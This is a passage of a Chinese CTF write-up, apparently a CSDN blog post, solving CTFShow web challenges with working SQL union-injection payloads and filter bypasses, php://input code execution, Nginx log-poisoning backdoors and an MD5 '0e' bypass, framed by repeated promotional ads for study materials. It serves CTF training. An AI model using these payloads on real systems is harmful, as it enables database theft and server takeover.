给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
获取数据库web2中的表
a’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘web2’),3 #
获取表flag中的字段, 很明显flag就在flag表中
a’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’),3 #
获取 flag
a’ union select 1,(select flag from flag),3 #
### CTFShow web3
>
> 第三关是一个文件包含漏洞, 推荐使用PHP://input伪协议进行任意代码执行
>
>
>
在url的参数中提交PHP伪协议
?url=php://input
使用代理工具( Burp Suite)抓包, 在POST请求体中输入需要执行的PHP代码, 比如执行系统命令:查看当前目录下的文件
当前目录下有两个文件, 目测flag就在 ctf\_go\_go\_go 文件中
接下来我们查看 ctf\_go\_go\_go 文件, 获取 flag, url的参数中使用PHP伪协议
?url=php://input
使用代理工具( Burp Suite)拦截请求, 在POST请求体中传递需要执行的PHP代码
成功拿到 flag
### CTFShow web4
>
> 第四关也是一个文件包含漏洞, 与第三关不同的是, 这一关过滤了PHP伪协议, 推荐使用日志注入
>
>
>
1.首先, 访问一下web服务器的日志文件( Nginx日志文件的默认位置是/var/log/nginx/access.log)
?url=/var/log/nginx/access.log
2.使用代理工具( Burp Suite)在请求头User-Agent的内容中插入后门
3.再次访问日志文件, 会发现新增了一条访问记录, 后门代码不会在页面中显示, 因为代码会被直接执行, 加下来我们使用蚁剑等工具链接后门即可
4.使用蚁剑的文件管理功能, 在网站根目录( www)下有一个 falg.txt, flag就在这个文件里面
### CTFShow web5
>
> 第五关是一个MD5加密漏洞, 这一关需要传递两个参数, 如果两个参数的MD5值相等, 即可输出 flag, 推荐使用0e绕过
>
>
>
payload如下
?v1=QNKCDZO&v2=240610708
### CTFShow web6
>
> 第六关是一个SQL注入漏洞, 注入类型为数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/\*\*/ 或 括号() 来绕过
>
>
>
**1.使用万能账号测试注入点**
括号()绕过, 用户名输入以下payload, 密码不用输
a’or(true)#
注释/\*\*/绕过
a’/**/or/**/true/**/#
页面有显示位( 查询出来的用户在页面的固定位置展示), 推荐使用联合注入
**2.脱库**
获取当前数据库, 盲猜 flag 就在当前使用的数据库中, 用户名输入以下payload, 密码不用输
a’union/**/select/**/1,database(),3#
获取数据库中的表
a’union/**/select/**/1,(select(group_concat(table_name))from/**/information_schema.tables/**/where/**/table_schema=‘web2’),3#
获取表中的字段
a’union/**/select/**/1,(select(group_concat(column_name))from/**/information_schema.columns/**/where/**/table_schema='web2’and/**/table_name=‘flag’),3#
获取 flag
a’union/**/select/**/1,(select/**/flag/**/from/**/flag),3#
### CTFShow web7
>
> 第七关也是一个SQL注入漏洞, 注入点是数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/\*\*/ 或 括号() 来绕过
>
>
>
**1.判断注入点**
url地址栏中输入以下payload, 是SQL恒成立, 可以查询到所有文章内容, 由此可证明存在SQL注入
?id=-1/**/or/**/true
页面存在显示位( 文章标题和文章内容在固定位置展示), 推荐使用联合注入
**2.脱库**
获取当前数据库, url中输入以下payload
-1/**/union/**/select/**/1,database(),3
获取数据库中的表
-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=“web7”),3
获取表中的字段
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
#### 2️⃣视频配套工具&国内外网安书籍、文档
##### ① 工具
##### ② 视频
##### ③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
##### ② 简历模板
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
776
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
